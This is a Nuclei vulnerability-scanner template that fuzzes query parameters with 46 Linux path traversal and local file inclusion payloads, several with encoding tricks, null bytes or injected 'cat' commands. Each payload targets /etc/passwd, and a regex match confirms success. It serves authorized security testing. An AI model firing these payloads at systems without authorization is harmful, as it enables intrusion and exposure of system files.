nuclei-templates/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml

id: linux-lfi-fuzz

info:
  name: Local File Inclusion - Linux
  author: DhiyaneshDK
  severity: high
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
  metadata:
    max-request: 46
  tags: lfi,dast,linux

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      nix_fuzz:
        - '/etc/passwd'
        - '../../etc/passwd'
        - '../../../etc/passwd'
        - '/../../../../etc/passwd'
        - '../../../../../../../../../etc/passwd'
        - '../../../../../../../../etc/passwd'
        - '../../../../../../../etc/passwd'
        - '../../../../../../etc/passwd'
        - '../../../../../etc/passwd'
        - '../../../../etc/passwd'
        - '../../../etc/passwd'
        - '../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd'
        - '/../../../../../../../../../../etc/passwd^^'
        - '/../../../../../../../../../../etc/passwd'
        - '/./././././././././././etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '%252e%252e%252fetc%252fpasswd'
        - '%252e%252e%252fetc%252fpasswd%00'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
        - '....//....//etc/passwd'
        - '..///////..////..//////etc/passwd'
        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
        - '%0a/bin/cat%20/etc/passwd'
        - '%00/etc/passwd%00'
        - '%00../../../../../../etc/passwd'
        - '/../../../../../../../../../../../etc/passwd%00.jpg'
        - '/../../../../../../../../../../../etc/passwd%00.html'
        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '\\'/bin/cat%20/etc/passwd\\''
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{nix_fuzz}}'

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950